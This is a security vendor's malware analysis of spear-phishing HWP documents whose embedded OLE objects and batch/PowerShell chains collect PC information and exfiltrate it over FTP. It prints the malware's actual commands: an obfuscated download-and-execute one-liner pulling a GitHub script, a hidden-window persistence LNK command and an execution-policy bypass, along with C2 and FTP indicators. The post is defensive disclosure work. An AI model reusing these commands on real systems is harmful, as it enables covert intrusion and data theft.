Warning Against HWP Documents Embedded with Malicious OLE Objects

AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.

The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.

The figure below shows a brief flow of operations of each type.

<Type 1>

This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.

Date	File name
May 25, 2023	Unification** cue sheet May 29 Mon.hwp
May 25, 2023	20230508_ProfessorMeetingMaterial_NewTemplate.hwp
May 25, 2023	(***)2023-05-30 Material for Professor Meeting.hwp
May 30, 2023	Payment Receipt (Chief ***).hwp
May 30, 2023	(Template)Payment Receipt_Congratulatory and Condolence Money.hwp
June 22, 2023	20230512_MyungbakScenario_Details.hwp
June 22, 2023	1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp
June 22, 2023	Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp
June 23, 2023	[Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp
June 29, 2023	National Defense and Protection Sacrificed to Political Disputes.hwp
July 11, 2023	** Unification April 30 2023 (Sun).hwp
July 17, 2023	Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp
July 20, 2023	42- Wagner’s Lesson (Aug 2023).hwp
July 24, 2023	[Template1] Business Budget Issue Request.hwp
Aug 14, 2023	Dissertation Evaluation (** Kwon).hwp
Sep 01, 2023	Evidentiary Documents of Incentive Payment.hwp
Sep 04, 2023	** Unification Sep 06 Final Wednesday.hwp
Sep 06, 2023	** Kim_Statement of Honorarium Payment.hwp
Sep 19, 2023	[Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp

Table 1. Identified HWP document file names

The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.

In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.

The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.

At the time of analysis, the URL was not available and anomalous behaviors could not be observed. The malicious URLs identified so far are as follows. It seems that these documents are being distributed to specific individuals due to the fact that each document uses a different parameter value.

• hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
• hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]

<Type 2>

This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.

Date	File name
July 31, 2023	test.hwp
July 27, 2023	Honorarium Information_aa.hwp
Aug 31, 2023	Consultation Request.hwp
Sep 01, 2023	Honorarium Template.hwp
Sep 14, 2023	main.hwp
Oct 04, 2023	test1.hwp
2023.10.04	cna[q].hwp

Table 2. Identified HWP document file names

The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).

When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.

zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.

Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.

down.txt, info.txt, and upload.txt seen in Figure 10 all have obfuscated pieces of data uploaded. Upon connecting to the corresponding URLs, these pieces of data are deobfuscated with a certain key value then executed.

The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.

Function Name	Feature
mainFunc	Changes PowerShell policy Functions executed in the following order: getinfo – uploadResult – downCommand
getinfo	Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt Collects user PC information such as network configuration information
uploadResult	Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt Uploads the collected information to the threat actor’s FTP server
downCommand	Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt Creates additional malicious files

Table 3. Features of each function

The function mainFunc which is executed first changes the current user’s PowerShell policy with the following command and enables the execution of the PowerShell script that is downloaded later on.

• Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force

The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%\Ahnlab\Ahnlab.hwp.

The table below shows the collected pieces of information.

Command	Collected Information
Get-ChildItem ([Environment]::GetFolderPath(“Recent”))	List of recently used files
ipconfig /all	List of network configurations
Get-process	List of processes

Table 4. Collected information

The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.

• Address: plm.myartsonline[.]com
• User name: 4154836

The function downCommand which is continuously executed afterward executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.

The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to  hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.

• LNK file command
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log‘);invoke-expression $x}
• thumbs.log data
  [string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c

While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.

With the malware from the post in June [2] also being distributed through HWP documents, there are multiple malicious HWP documents in distribution nowadays. When opening an HWP document, users must pay attention to its author and the sender.

[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)

[IOC]
<hwp>
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
<script>
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
<C2>
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Warning Against HWP Documents Embedded with Malicious OLE Objects appeared first on ASEC BLOG.

Article Link: Warning Against HWP Documents Embedded with Malicious OLE Objects - ASEC BLOG